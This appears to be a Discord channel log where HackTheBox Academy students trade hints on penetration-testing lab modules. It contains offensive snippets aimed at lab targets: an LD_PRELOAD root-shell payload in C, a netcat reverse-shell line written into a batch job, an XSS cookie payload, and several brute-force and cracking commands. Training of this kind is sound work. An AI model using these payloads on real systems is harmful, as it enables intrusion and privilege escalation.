#modules

only 3 - h.inlanefreight.htb, c.inlanefreight.htb and n.inlanefreight.htb. I might be missing one?

Yeah, those aren't the nameservers, dm me.

Who should resolve these domains?
htb is not an approved TLD 😉

Anyone free for a nudge on Attacking Common Application -> Attacking Thick Client Webapps. I am on the SQLi portion and successfully compiled the java program but its not displaying anything. I think the code snippet from the module broke the application for the invoker

wdym not displaying anything

Hi all, could someone help me confirming the scope for AD Enumeration & Attacks - Skills Assessment Part II? Does "full-scope" mean whole network (so /16 would be allowed for instance), or is it limited to something more specific?

thank you !!!

can anyone help me hack my old roblox account is want it back so bad ngl

Hey guys. I am doing only 28 pentest modules in preparation for CPTS, and I was confused about the PASSWORD ATTACKS - Credential Hunting in Windows laboratory where I have to get the WinSCP credentials, there is a tip that is to download a tool (which in lab says which it is), but the issue is that the target machine does not have internet access.

Can anybody help me ?

Ask Roblox Support

Often the required tools are located in C:\Tools

Download it into your system and do a file transfer to the victim machine. Also what payload said

guyz iam new here

Module: Footprinting
Hi, anyone here finished the Section: Footprinting Lab - Easy without using bruteforce tool? I got the flag but I'm thinking if there is another option to solve it or it is the intended way.

not the channel for introductions. read #rules and #welcome

Footprinting Module

hello, i have question with AD Enumeration & Attacks - Skills Assessment Part II question 10 :+ 1 Crack this user's password hash and submit the cleartext password as your answer. i found CT*** user via bloodhound but i cant get user hash .

Thank you it was helpful!!!! That’s why think out of the box.

so, I am doing the footprinting easy lab

and I am unsure if this is a firewall issue on my part or something else but when connected to ||ftp|| with the correct creds I got from the ||header|| + ||bruteforcing|| I cannot get a list I constantly get this message: || 229 Entering Extended Passive Mode (|4916|) 150 Opening ASCII mode data connection for file list|| I have tried via ||web-browser|| and via ||wget|| but unsure of where I am going wrong

can someone point me in the right direction?

Oh have also tried the above on the pwn box too so no idea

Are you connecting to the alternative port?

I have been, and then the normal one
I'm guessing I need to figure out ||ftp proxies||?

No

hmmm

What does your command and output look like?

Also are you able to ls/ get files ones you're in ftp

nah

I can't

||┌──(kali㉿kali)-[~/Desktop/Tmp] └─$ ftp 10.129.215.171 21 Connected to 10.129.215.171. 220 ProFTPD Server (ftp.int.inlanefreight.htb) [10.129.215.171] Name (10.129.215.171:kali): ceil 331 Password required for ceil Password: 230 User ceil logged in Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 229 Entering Extended Passive Mode (|||5449|) 150 Opening ASCII mode data connection for file list 226 Transfer complete||

Same when I use pwnbox btw

even tried this

there is a non-default port

I know, but I am getting the same errors

@naive wadi wget -m --no-passive ftp://[user]:[pass]@white rock:2121

I did, that, figured it out now.

Thanks

I was honestly being really stupid out of frustration

Hi, Do you think you can help me out with this? I read the thread and am stuck at the same place. Thanks!

check other subdomains

Hello, i need help in linux privilege escalation, i'm exploiting LD_PRELOAD environment variable.

Script i'm using is
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}

Error i'm receiving is warning: implicit declaration of function 'setgid' [-Wimplicit-function-declaration]

Hey, need help, I have a problem with netcat on listening to the port 4444 in the unified machine, I tried to change the port of the Shell but it didnt work

Hi someone can help me in OSINT: Corporate Recon module? What is the email address for enterprise customer support?

check the hint

Hello my friends, how are you all? I hope the sun is shining wherever you are.

I seem to be having some difficulties with finding public exploits for OpenSSH 8.8 (protocol 2.0) for the "Getting Started: Public Exploits" module. The hint is sending me towards "plugin exploits" but I cannot seem to find any through conventional means. Some help would be much appreciated

thank you all

Hello. Please, someone can help me with question "Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host." in "AD Enumeration & Attacks - Skills Assessment Part II" section? I noticed that C**** has the ||DS-Replication-Get-Changes|| and the ||DS-Replication-Get-Changes-All|| privilege, but I fail abuse this privilege. I already RDP in MS01. I'm on good track?

EDIT: solved ✅

Suggest to try the search exploit method displayed in the lesson

I managed to get the flag by using scanner/http/wp_simple_backup_file_read exploit through metasploit

using the method displayed in lesson didn't work

Metasploit is displayed in the lesson 🤔

oh i thought you meant the actual exploit the lesson uses

my bad

All good.
It's a decent primer to prepare for alot of out of the box thinking

Can anyone assist a bit with the http attacks module ?

Surely the response to question 2 in Preparation Stage (Part2) of Incident Handling Process is a mistake from the makers?

Having an issue with this myself.

I keep getting back strings of 33 or 31 characters.

Could use help on it if anyone's got time

Hello guys, do u can help me with this question " Where is the Laudanum aspx web shell located on Pwnbox? Submit the full path. (Format: /path/to/laudanum/aspx)"? I found both paths ||/usr/share/webshells/laudanum/aspx and /usr/share/laudanum/aspx but neither of the 2 is correct. ||I tried entering the path under useful as well but that wasn't even the correct answer. I have completed all the exercises in the module but cannot find the answer to this question.

don't forget to include the name of the file

Because you're not meant to exploit ssh

@narrow solar do this: ls -la when in the ftp server

already tried it

still empty

perhaps you are looking at the wrong ftp server

oh god, i tried it before bot without the -la 😅 thanks a lot 🥰

hey, can anyone help me with Password Attack easy lab? I read earlier messages about it and didnt found any hints for me
I connected by m*** via ssh and tried a lot of but didnt get something interesting
i will be glad to see you in my private messages

If you didn't find anything interesting you weren't looking hard enough.

what should I to do with what I found?

Can someone please help with Footprinting lab-hard
I've successfully ssh into the box as user T. Ls -a shows all the hidden files and mysql gives a hint. I tried loggin with the credentials I have but it still failed. Found a second user and used the same password, failed too. Any hints?

Attacking Common Services (Attacking DNS)
I use subbrute for subdomains 1. [echo “targetIP” > ./resolvers.txt] 2. [python subbrute.py inlanefreight.htb -s ./names.txt -r ./resolvers.txt ] and than i checked each subdomain listed with dig axfr @10.129.198.103 helpdesk.inlanefreight.htb. am i doing anything wrong?

Solved.

I Solved this lol
that was really easy xD

very basic

Nice one 👊

Use subbrute - replace the existing resolvers.txt file with the url of of the target nameserver (the ip of the target you spin up). Then,
Try zone transfers on each of the subdomains you find 🙂

Can someone please help with Footprinting lab-hard
I've successfully ssh into the box as user Tom. Ls -a shows all the hidden files and mysql gives a hint. I tried loggin with the credentials I have but it still failed. Found a second user and used the same password, failed too. Any hints?

History?

Try running as Administrator

Direct message me if you still need help.

Hey Bro I need a help

the question What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word) in ACL Enumeration i used bloodhound and found 2 OAT but it isn't correct can someone help me

How does that have anything to do with HTB academy?

why are you shaming the question above? it's obviously about a module

@limber widget indeed it is a module so it has everthing to do with htb Academy

that was not related to you

get rekt

there was another message that was deleted by moderators

from someone else

it was unrelated

oww oke i though like what??

hello. it seems embarassing, but what is the password for the pwnbox's user? just got my Student subcription and trying "Attacking common services", FTP labs works like a charm without superuser permission, but smb lab asks for it. For first though i think the pwnbox is like the GCP, using publickey but seems not.

okay, got it. the credential file on desktop is hidden because the screen is too small. i

need a hint in sqlmap essentials - skill assessment

please

Where are you stuck?

New module ...
https://bit.ly/43j1tWm

mini-module

figure it out

nobody's gunna just give you the flag lmao

The application launches but when I click configs or notes or w/e in the file drop down it doesnt display anything which tells me the Invoker java might be messed up

currently trying to download the fatty-server.jar^

ah so youre a little before the SQLi portion technically

I would try redoing it because you might've had a typo

I'm struggling to run 7z2john.

Ok managed to run it but now I'm struggling to identify it..

Yeah thats the part I got stuck on. I had to step away because I was getting frustrated and needed to come back fresh. The code snippet they want us to insert into the invoker.java they want inserted around like 132ish right?

Someone who did XSS module?

idr the exact line but yeah, and their snippet worked for me so it isnt a fault in the instructions as much as I think the section overall is pretty bad.

am doing ||<script>alert(document.cookie)</script>|| in the stored xss section

and is not working

try looking at the source code and seeing where it's breaking to not execute

there may be some tags you have to close out of

it is supposed to be like that

i think i disabled the alerts

how can i activate them back?

just to make sure, you're hitting enter to submit the payload?

lol

Attack common services (Attack SQL Databases)

[] Encryption required, switching to TLS [] ENVCHANGE (DATABASE): Old Value: master, New Value: master

[*] ENVCHANGE (LANGUAGE): Old Value: New Value: us_english

[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192

[] INFO(WIN-02\SQLEXPRESS): Line 1: Changed database context [] INFO(WIN-02\SQLEXPRESS): Line 1: Changed language setting to us_english.

to 'master'.

[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)

[!] Press help for extra shell commands SQL> select name from master.dbo.sysdatabases

name

master

tempdb

model

msdb

hmaildb

flagDB

SQL> select table_name from flagDB.information_schema.tables table_name

tb_flag

SQL>

What command would I use to read the tb_flag?

maybe the database

flagDB?

lol

well select the database and then just select *

nothing fancy needed here

select * from tb_flag;

did you get it to work?

https://quickref.me/

yea

had to restart the machine was bugged

ah okay

@zinc marsh Thanks

As I recall, this one needed a windows vm.

i completed that module

and i have done all in kali

except the MacOS fundamentals that u need MacOS

Microsoft SQL Server

This is not working

I could have used some help lol
I had to install a windows vm and use MSSQL studio and that vm breaks after every restart

MSSQL Studio

agreed... I feel like it doesnt fit the overall theme of the module as a whole

it used to be worse lol

its also not on the CPTS exam

have you selected the flagDB database before?

oh is mssql

just go to google and search for a cheatsheet for mssql

||```SELECT * FROM flagDB.dbo.tb_flag;

should be something like that if im right

can someone help with first task in LOGIN BRUTE FORCING Skills Assessment - Service login ?

previous one should work. I have it in my notes as|| select * from tb_flag||

he is not using the flagDB databse then

with that command he doesnt need to be using the database

that's what I was already suspecting, yeah

fair

sure, dm me if you want

anyway just use google or chatgpt @long grove

dm if u want

i finished it yesterday lol

hi I am stuck in this wireshark exercise and need some help. This is the Intro to Network Traffic Analysis section

hold on a sec

has anyone recently completed the password attack section and module Pass the Ticket (PtT) from Linux

its not accepting my answer for julio's flag

nor is the question/answer correct on the module it seems

I have completed that module but all of my notes were lost. 😦

the question asks " What was the filename of the image that contained a certain Transformer Leader? (name.filetype) ?" I found the other answer in the section ezpz

this is the Packet Inception, Dissecting Network Traffic With Wireshark section

I keep looking for stuff in the packet capture and nothing comes up

I mean it does

there's traffic

but I can't find the specified http packet

https://cdn.discordapp.com/attachments/774040263278592041/1110632934861455491/image.png
I'm struggling to identify a hash from a 7z file that I got with 7z2john

have you filtered the http traffic?

there's a bunch of HTTP 200 OK packets but how do I know which one corresponds to the right GET request

yes

its interpreting the special characters in the front as bash commands, wrap it in quotes

I tried and still didnt work

but also idk of hashid works for those file hashes anyways

no worries. If someone has done this please let me know.

the problem is I can't figure out which HTTP 200 OK packet is also an ACK cuz it doesn't say "ACK" on any of the HTTP 200 OK packets

never bothered trying, just plugged it into john

So how do I identify it?

I need to hashcat it

So I need to know the mode

all ACK packets are labeled so its hard to figure out how to just filter for that

like for HTTP 200 OK codes that are also ACKs

this is more john's forte

wym?

Im saying if you want to use hashcat instead of john to process an X2john result then youre pretty much on your own to research it. Should just use john

can read the 7z2john script to glean information or google about how 7z archives password protections work

the question is "what is the filename of the image that contained a certain Transformer leader"

but without finding the HTTP 200 OK that is acknowedging a user's GET request I won't find it I'm pretty sure

also just googling 7z hashcat and the very first result explains how to do it with hashcat

hi is anyone able to help me?

feel free to dm me, I can verify

im just doing the 7z course, no idea what youre saying here it just told me to use 7z2john to get the hash and dehash it

hi is someone gonna help or should I go elsewhere?

what do you think?

we have been trying to help

yo chill

I sent a screen shot of the directions

ok sorry

ok hold on

just cause you dont get an answer in .5 seconds doesnt mean you should cry about, clearly I at least am in the middle of helping someone else

ok sorry I am just impatient because of how frustrated I am at this challenge I have been trying to solve. I should have been more patietnt.

which module/section are you on? and wdym by dehash.

All im saying is john is a better tool for cracking the hash then hashcat is, unless you do some googling to find a different tool to extract the hash.

OMG I just recovered my lost notes

thank you icloud

brute force the hash is what i mean by dehash

HashCat course, Cracking Miscellaneous Files & Hashes

Havnt done that module. Id imagine they have instructions on how to retrieve the appropriate hash for hashcat and the mode to use

if not, use john anyways or google as I mentioned.

sounds like its the first result right there

so use 7Z?

if that's what the file is

@quasi wave dm me and I will help you in detail

there are multiple ways to find the answer and they are simple.

@lament lance hash identifier

https://hashes.com/en/tools/hash_identifier

wym?

tried that

gave mesome weird cisco hash

https://hashcat.net/wiki/doku.php?id=example_hashes

You dont need to ID it lol

7Z hash not working

to crack it

with hascat

he has a list provided by the section of the corresponding modes

looks running to me

oh now it is

but its way too slow

let me run it on my host machine

nvm

it got cracked in the pwnbox

11600 7-Zip

🙂

thanks guys

np

when it doubt always read the section again!

it was the first thing i tried but it looked like its not running so i assumed its wrong hash

hey guys can someone help me with Client-Side Validation/ file upload

just remember in the real world things are rarely as fast lol

I spent a week trying to crack a hash I was working on and in the end it just wasnt doable

im used to all cracking being done in less than a second on my 3090 lol

all cracking is a bold claim

some things are simple done properly and the heat death of the universe isnt enough to crack it

then u havent done too much cracking outside the academy

hey everyone, need some help with Attacking Passwords module, section Passwd, Shadow & Opasswd. Is there a kind soul that will lend me a hand?

https://dontasktoask.com

sure, what's the issue?

fair enough.

its a good read for asking better questions

Guys I'm working through Passwd, Shadow & Opasswd section in Attacking Passwords, and I cannot find a way to hack the SHA-512 hashes from the /etc/shadow file. Can someone help me out please?

@hardy socket what wordlist are you using?

rockyou.txt

try using the mut password list

also, I cannot even figure out how to unshadow the hashes or even if it is required

DM me

cheers!

someone i can ask 1 thing about xsstriker?

https://dontasktoask.com

Hey!!

#Module: Documentation & Reporting
#Section: Notetaking & Organization
#Sub-section: Evidence

Can anyone help me figure out how to link a directory tree on my file system to obsidian. It's mentioned in the above sections. But doesn't explain how.

Can someone please help me

depends, do you have a specific question?

https://dontasktoask.com

Ive used it so many times in this channel I could practically type it blindfolded.

Had to block Ichi. He was wanting someone to help him hack whatsapp

maybe a little less than a quarter of people actually read it.

I would if he had asked here in public.

eh, just blocked him so he cant dm me anymore. If he is dumb enough to ask here he can get banned. Or I could

<@&861185840277487616> @obtuse wigeon

This is still a channel for #modules

he was originally soliciting people in this channel

No. Just dm a mod

but yeah he shoulda DMd

cool tell me about it in a relevant channel lol

What filter will allow me to see traffic coming from or destined to the host with an ip of 10.10.20.1?
||ip.addr|| ? hackthebox keeps refusing my answer

Google

||tshark host 10.10.20.1|| if im right

||tshark -i <interface> host 10.10.20.1|| this one if it is in real time

thank you

but yeah google answers all ur doubts

#Module: FOOTPRINTING
#Section: Host Based Enumeration
#Sub-section: DNS

last qustiion: which domain names list should i used -- while am trying to burfurcing the subdomain?

Start with the smallest list in SecLists. If you don't find anything, use the next larger list.

i used subdomains-top1million-110000.txt and did not find the host

This list is too big

use the smallest list

ok .. i will try

i start brute-forcing using the following list subdomains-top1million-5000.txt

too big 😉

use the smallest list

where do I post support questions?

I could not find that host x.x.x.203

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

Thanks!

You have to find all zones and then query the zone that does not give you the data voluntarily with the smallest or second smallest list (SecLists).

u can enumerate subdomains of subdomains ^^

Hey, just starting out and wanted to try the free tier before I pump my $$ into this. Trying to get the flag for the first mod (HyperText Transfer Protocol (HTTP)). I have the correct command curl -s -O http://[IP ADDRESS]:[PORT#]/download.php. For some reason the file is not downloading and I don't know what I'm doing wrong!

Which module are you in?

did u connect to the vpn?

or started a pwnbox

@zinc marsh I'm working the first module in htb Academy, I just went to the bottom of the page and clicked the start machine button and then started the target ip listed below that

and did u run the command?

IP address and port indicates a Docker container. Then there is no need for a VPN

But without the name of the module I can only guess

@zinc marsh @acoustic owl the module is HyperText Transfer Protocol (HTTP) in the Bug Bounty Cert

i guess the module is web requests

since it is the first

i got it

from his own vm he doesnt need the vpn?

-0 {put the file name } output filename

that is -o

but he doesnt need to download anything to get the flag

use curl -h

and try the curl command u think is right

If it is a Docker container, then it is accessible over the Internet.

but read first what each command does in curl

oh i thought the container could only be accessed from the local machine

I'm 90% positive my syntax is correct, I even watched tutorial where the person used the same syntax and got he answer

is not

even if u want to download the file the flag is -o

||curl -s -o <file> IP:PORT||

@zinc marsh Let me try that...the instructions and cheat sheet say curl -s -O inlanefreight.com/index.html

Shhot....I'll have to do it tomorrow, my machine timed out it looks like

as i told curl -h

to read the commands

 -d, --data <data>          HTTP POST data
 -f, --fail                 Fail fast with no output on HTTP errors
 -h, --help <category>      Get help for commands
 -i, --include              Include protocol response headers in the output
 -o, --output <file>        Write to file instead of stdout
 -O, --remote-name          Write output to a file named as the remote file
 -s, --silent               Silent mode
 -T, --upload-file <file>   Transfer local FILE to destination
 -u, --user <user:password> Server user and password
 -A, --user-agent <name>    Send User-Agent <name> to server
 -v, --verbose              Make the operation more talkative
 -V, --version              Show version number and quit

This is not the full help, this menu is stripped into categories.
Use "--help category" to get an overview of all categories.
For all options use the manual or "--help all".```

do it on ur own machine

k...let me try that!

me

yea

yea

if u want output just -o file

@zinc marsh well, I thank you for your help, I'd been smashing my head for hours on that

Please delete this message.
Flags are not allowed to be posted.

@acoustic owl What an idiot! Sorry, thanks for the headsup

No problem 🙂

i posted a flag?

That was not related to you

oh okey was him

i hadnt read it

sure

I have made it to around 19 modules so far, if anyone needs assistance with the ones listed in the image, DM me.

i have done these one if someone need help in any of them:

I find it best to just pick and choose to help people in chat.

Random DMs are a great way to lose brain cells

it makes me remember better the things

@zinc marsh Do you plan to do any pro labs before the actual exam?

i want do all the modules i can buy with my cubes first

while im making the weekly machines

Oh right, that's a very long journey

Good luck

wow, how much time did you take ?

Haha, HTB brings out modules faster than you can learn

idk i study at least 12h a day

so what's the date you started? do you take down notes?

i am so impressed

i know but i mean with my cubes lol

when they run out i will move to the retire machiens and challenges

and will keep buying the modules i can monthly with the platinum sub

sounds fun

yea i take notes from the cheatsheets, scripts and the exploitation of the questions

cheatsheets? there are cheatsheets?

yea

That's how I'm currently doing it, too. But you finish a module and HTB brings out at least one new module. 🤪

yea they added 1 today lol

@fickle thicket i started from zero like 5months ago

when will htb academy introduce python scripting. there's only bash scripting rn

but i started in tryhackme and then i moved here

i came to hackthebox when i finished all the paths in tryhackme

there is introduction to python3

This is a awesome list!!!! Great work

but yeah i told in suggestions to add more modules for bash and python

Thanks.

tryhackme🤣 i find it hard to rmb stuff when i study in thm. is hard to rmb things without pain

i came from offsec learn fundamentals and found it better than thm then i saw htb academy and found it even more comprehensive than learn fundamentals🤣🤣🤣🤣

for me was easier in thm

for fundamentals

well see ya am going to start web proxies

What OS do you use? Kali or Parrot?

@acoustic owl do u prefer burp suite or zap

It's Ubuntu with kali and windows vm

burp

i counted how many i can do i have to do 24 more

Can anyone assist me w/ server-side attack module - Nginx Reverse Proxy & AJP section? I believe I've done everything correctly but when I go to curl the target - I get a "(28) Failed to connect" or a "(52) Empty reply from server."

so like 28 more surely since u get 20% cubes back

Everyone here started from scratch. That is quite normal

we all started from zero

am still just a script kiddie

Hey I'm on the getting started module and im stuck on the thrid question for the user bob password. I have tried to use the password they have and many others but I cannot access the user. Can I get some guidance?

which section of Getting Started are you on?

service scanning

third question

tried the password that they have but it didn't work

$ smbclient -U bob \\10.129.225.61\ users
Password for [WORKGROUP\bob]:
do_connect: Connection to failed (Error NT_STATUS_NOT_FOUND)

I cannot attach a screenshot i do not have permissions yet

You need to verify your account
Read #welcome and #rules

and this whole time I just thought I could not post screenshots! 🤦‍♂️ Thanks for that tidbit...!

maybe you have the slashes the wrong way? The password from the example seems to work for me.Might also be that space before users

Believe it or not; he has the correct format, each of the slashes are doubled. Discord formatting escapes then does the literal slash. So \\\\ looks like \\

Their error is most likely the space between the slash and users as the error is a NT status error

And not the "not enough \ error

Well it seems to work with the way I did the screen shot as well. But yeah if I use backslashes I need \\ip\users

doh! it escaped them 🤦‍♂️

:) discord formatting be funny

But yes both work

:D

I prefer the forward slashes to avoid headaches

Agreed!

Can anyone help me with the Intro to Assembly procedure module wherein you are to find the 0xaddress without zeros on the top of the stack once you enter Exit.. This is right after creating the loop function... I'm quite lost I guess

need a nudge for "password attacks lab easy". able to ssh in as M*** but unable to escalate to root from there. thank you.

history is an interesting subject

thanks, lol

ATTACKING COMMON SERVICES (Attacking SMB)

Qustions: Login as the user "jason" via SSH and find the flag.txt file. Submit the contents as your answer.

┌─[eu-academy-2]─[10.10.15.190]─[htb-ac-624665@htb-o92gf8gizh]─[~]
└──╼ [★]$ ssh jason@10.129.109.29
The authenticity of host '10.129.109.29 (10.129.109.29)' can't be established.
ECDSA key fingerprint is SHA256:3I77Le3AqCEUd+1LBAraYTRTF74wwJZJiYcnwfF5yAs.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.109.29' (ECDSA) to the list of known hosts.
jason@10.129.109.29: Permission denied (publickey).
┌─[eu-academy-2]─[10.10.15.190]─[htb-ac-624665@htb-o92gf8gizh]─[~]

Why doesn't SSH login?

because you need a key

can you verified if the machine has actually spawned?

Where can I get the publickey?

Working on the Attacking Enterprise Networks module and I have the SSRF into LFI on one of the domains, but I cant find where the actual flag for the associated question is supposed to be.

nvm got it

one of my guesses that was error 502 was actually right and I just had to re guess it for the 5th time before it gave me the correct result.

Is anyone can help with Medium Lab - Password Attack?
Thats strange, but I really cant understand what I should to do next
||I used creds from easy lab (user m***) and auth to smb to get archive. Cracked that archive and docs file inside. That gives to me some combintation of numbers (9....)...so when I tried to open docs file - I had seen encrypted symbols. How should I used the password from docs or what the hell is this xD ||I really cant understand how to solve this lab
Can you please show me the right way? DM me please

I have this in the getting started knowledge check. I've tried to run a php reverse shell using sudo with it, but it just spat the code of the file back out at me and nothing happened.

Just as a sanity check: "sudo /usr/bin/php revshell.php" will in fact run as root right?

Nvm got it to work.

Hello

Can anyone help me with PC season machine

I’m stuck in this unknown port

Found exploit for default credentials but don’t know how to authenticate

solved

Does anyone know what to do with error: unable to select packages: doas (no such package) while I have it already installed?

Solved already

I need some help here pls i found the directory for no flag.txt in there

ATTACKING COMMON APPLICATIONS  ==>  WordPress - Discovery & Enumeration
-------------------------------------------------------------------
vHosts needed for these questions:
blog.inlanefreight.local
 Enumerate the host and find a flag.txt flag in an accessible directory.
------------------------------------------------------------------------

Directory listing is enabled

how i can gain more points only throygh buy credits?

what kind of points are you looking for

i got new account

i want to watch wordpress and brute forcing passwords

if you are referring to academy, then you need cubes which you can get either with a subscription or a one time payment

thank you

is it worht it to be honest? i try some vixeos from youtube withpput any real effect

Yes i was about to access the directory.. ||/wp-includes || but couldn't see the flag there

The modules are more than just teaching, as they have hands-on labs that directly reflect the content, which will reinforce the learning.

Try with a different one

can anyone help me reach out why this code: ||echo C:\Log-Management\nc64.exe -e cmd.exe 10.10
.14.18 1337 > C:\Log-Management\job.bat|| is not working?

sorry it works but nc does not reach this port

But pls help

that helped

guyz

hack my wifi router

its not working

Hello colleagues, I can't find this question as such
What is the type of the service of the "syslog.service"?

Linux fundamentals

Upload Exploitation
Try to exploit the upload feature to upload a web shell and get the content of /flag.txt

which dir

i can get the shell but not able fine the flag

checked all the dir

any hint?

/flag.txt is the exact path specification. The file is located in the root directory /

yes have check that but not there

hey guys can you help me with the PC machine?

Try the #1109540152663085056 channel

i dont have access to that

do i have to do something to get accesss

Verify your account
read #welcome and #rules

Systemctl show syslog.service --> Type= notify

Hey guys,
according to SQL Fundamentals module / Union Clause section, the statement "SELECT <number> from <table_name>" returns the given number as column name and as a value for every row in the specified table. Why does this work exactly?
I would expect an error here because a column named <number> doesn't exist. At the same time, <number> might be interpreted as a number and not as a string here... :/

@acoustic owl when i purchase the plan that is 7 euro on month, when i unlock some section from job path can i still continue the section when the plan is expired

using web proxies - skill assessment - Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload) i think im doing it right but im not able to get the flag

In the Footprinting module under SNMP there is a task to "Enumerate the custom script that is running on the system and submit its output as the answer.".
|| Is there any more to it than just running snmpwalk? I found it, but it seems implied that there is a way to target the script itself. Yet snmpwalk kinda just spat it out on its own. || I just wanna make sure I'm not missing out on something they meant to teach.

yea the modules u buy are urs

Any hints for the last hop in the pivoting skills assessment?

the numbers are basically place holders. if you run SELECT id, name, 3, 4 FROM customer the first two columns refer to the actual ones, while the latter two are just plain 3 / 4 respectively.
Output might look like this:
1 admin 3 4
2 nimda 3 4
3 guest 3 4

if you buy a module with cubes you keep it. if you have a subscription that unlocks it for you, you keep access to the ones you completed. To others you'll lose access once the subscription runs out

dm me if you're still stuck

Doing Pivoting, Tunneling, and Port Forwarding:Web Server Pivoting with Rpivot and I have got a connection, yet the web page hangs and i get this error The server at 172.16.5.135 is taking too long to respond.

any help is appreciated

Afaik it simply spits it out, nothing fancy to do here. it'd probably be possible to filter the output but if but idk if snmpwalk can even do that

If you have completed the module 100% during your subscription, the module is yours.

Okay! Thanks!

feel free to dm me if you're still stuck

well first step would be restarting the machine. if that doesn't help, dm me

SOLVED

great 🙂
What was the issue?

the issue was I was trying to open firefox with proxychains while it's already open, so i closed firefox and launched it again with proxychains and the connection was established

yeah that woulda been my next guess. I ran into the exact same problem

hello folks, I'm stuck on the skills assessment for the module CRACKING PASSWORDS WITH HASHCAT. I need to crack the ntds file hashes but I guess that trying to do one hash at the time is not the best way. Is there anyone that ended this module and may helps?

Hey guys, can someone give me a nudge of the Nmap hard lab? I found ||3 open ports: 22, 80 and 50000 and a filtered FTP port 990||. I tried connecting with ||ncat -nv --source-port 53 10.129.128.219 <port> to ports 50000, 22 and 990|| but it all gave timeouts.

yes but there are 1005 hashes in the list to hack

ok i'll check this out Moo

thanks

it's the last question. I already accomplished the rest of the test.

I contact you in dm Moo, for not spamming around

if it's ok for you

ok, I'm gonna try that

thanks

If anyone happened to finish the Common Applications - Attacking Web Thick-Client Applications section could I DM you regarding the part where we modify the Invoker.jar to download files

thanks Moo! I'll try that

anyone have a good method to bulk download tools from one host to another? one of the most annoying things I've found so far is having to move tools around a bunch. I've pretty much just resorted to keeping the curl command in notes. but still a bit annoying.

if its windows, you could use the smbserver from impacket and mount the directory where all the tools are as a network share on the windows machine so when you need any you can copy to PWD or writable location

I suppose that works for just "single hop" scenarios. actually would work nicely. the most annoying this for me is when pivot hosts are involved. then it's like ok.... put files on the pivot then to the target but make sure you got another shell and method to serve up those files

tedious I guess is what I mean.

well if you have a solid pivot running over multiple hosts with like chisel or something, you can directly copy to target without copying to all hosts in between

like you can run proxychains scp /path/to/tool user@TARGET_IP:/home/user for example

Hey guys, can someone give me a nudge of the Nmap hard lab? I found ||3 open ports: 22, 80 and 50000 and a filtered FTP port 990||. I tried connecting with ||ncat -nv --source-port 53 10.129.128.219 <port> to ports 50000, 22 and 990|| but it all gave timeouts. Can I dm anyone for help?

One of those should be correct try resetting the lab and redoing your command

I'm stuck on the Firewall and IDS/IPS Evasion - Medium Lab :- nmap -sSU -A -sV -p 53 10.129.2.48 used this command . anyone can help me ?

||that command should work. recheck your output||

Yes thank you! I got ||SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.10|| from connecting on ||port 22|| but that was not the flag that they were looking for, not sure if im inputting it wrong?

Well then try a different port

:)

Remember all netcat is doing is connecting to a port. If it's open, it'll connect and give you a banner

Thank you so much! I finally got it!

Find the existing exploit in MSF and use it to get a shell on the target. What is the username of the user you obtained a shell with?

Anyone can help me with this in sessions and jobs section of MSFconsole module

The module should tell you how to check the user you are

There are like 1000 differnt vulnerabilities on the system i have no clue which one to exploit

I don't recall it being that difficult. Those vulns look like they relate to ssh. Which in that case you're looking in the wrong direction

are u trying to say theres a different port?

There should be iirc

i hate full scans they take so long thats why

alright ill check

Just do a regular scan first

I did

same ports open

i just did a scan with the NSE --scirpt vuln

Well look at the ports: the script output can really mess up what you see

PORT STATE SERVICE VERSION
53/tcp open domain NLnet Labs NSD
53/udp open domain NLnet Labs NSD

I dont think i remeber very well but

try with -A

tried doesnt work

itll work for the hard

i dont remeber

for medium

Hard doesn't need -A

If u dont do -A it wont show the /spoiler

||robots.txt||

I've seen this before. someone else had the same problem but unfortunately I don't remember what the fix was. might be restarting the machine

Restarting machine or doing in pwnbox

It's a slippery one

hi guys

I'm still having trouble with the Packet Inception, Dissecting Network Traffic With Wireshark section of Intro to Network Traffic Analysis module

can someone help me out here?

I try to export objects to http but the http option is greyed out

ah what needed was just restarting machine , wasted hours on this

I'm stuck in Linux fundamentals - Navigation questions What is the name of the hidden "history" file in the htb-user's home directory? && What is the index number of the "sudoers" file in the "/etc" directory? I used ls -i too see index number, I get the index number but the questions won't except

just took the flag! I really suggest you to use the ruleset OneRuleRuleThemAll and the wordlist rockyou!

and extra tip: https://codepen.io/finnhvman/pen/oPwXRa this webapp outputs all the duplicate words on a list! Reeeeeally helpful

You are asked for Bob's password

Hi

How do we start to work what is the website

I have a university account and the university subscription cannot be activated

contact support

your uni probably isnt on their automatic verification list, but if you talk to support they can adjust you in if its appropriate to do so

I don't know how to communicate with them

green bubble in the corner, disable adblock if you have it

oky

not found

Its there for me

did you disable adblock

solved it I was using wrong file

lmao

YES

Can send me link

he wasnt talking about you 😂

theres not a link, you gotta go through the chat bubble

not found

Help Center

or not

support bubble is on the help site too

dm screenshot of your browser

I've reached it on chrome

👍

thank you

I'm struggling with the " Extract the PMKID hash from the attached .cap file and crack it. " question on cracking WPA handshakes section of hashcat module. When i try to run the file through hashcat, I get this:

whats the issue? looks like it worked in your image

What's the command for installing python 2.7?

should just be
sudo apt install python2

sudo apt-get install python2.7

sudo yum install python27 if u have red hat

btw guys is there any like small groups where u can join to study together etc?

guys any alternative to windows os ?

i can run steam, .exe stuff, and etc

like windws

windows*

apt-get is deprecated

That's unrelated to academy content. Read #rules and #welcome

hm

Your question is not related to this channel

Simple as thar

google

?

bro im talking about

any alternative's to windows

or blind

<@&861185840277487616> can we get rid of this person. Just talks off topic and insults people

ok?

so funny omg

alternatives for what

all depends what u wanna do lol

There's fifty million Linux flavors and then there's Apple, and they all do different things well

is there anyway to take screenshots in the vm to paste them in obsidian?

Why shouldn't that work?

the screenshots are saved in the vm

i want to paste them in obsidian

i got it

I'm a big fan of Greenshot btw for that

flameshot is pretty good as well.

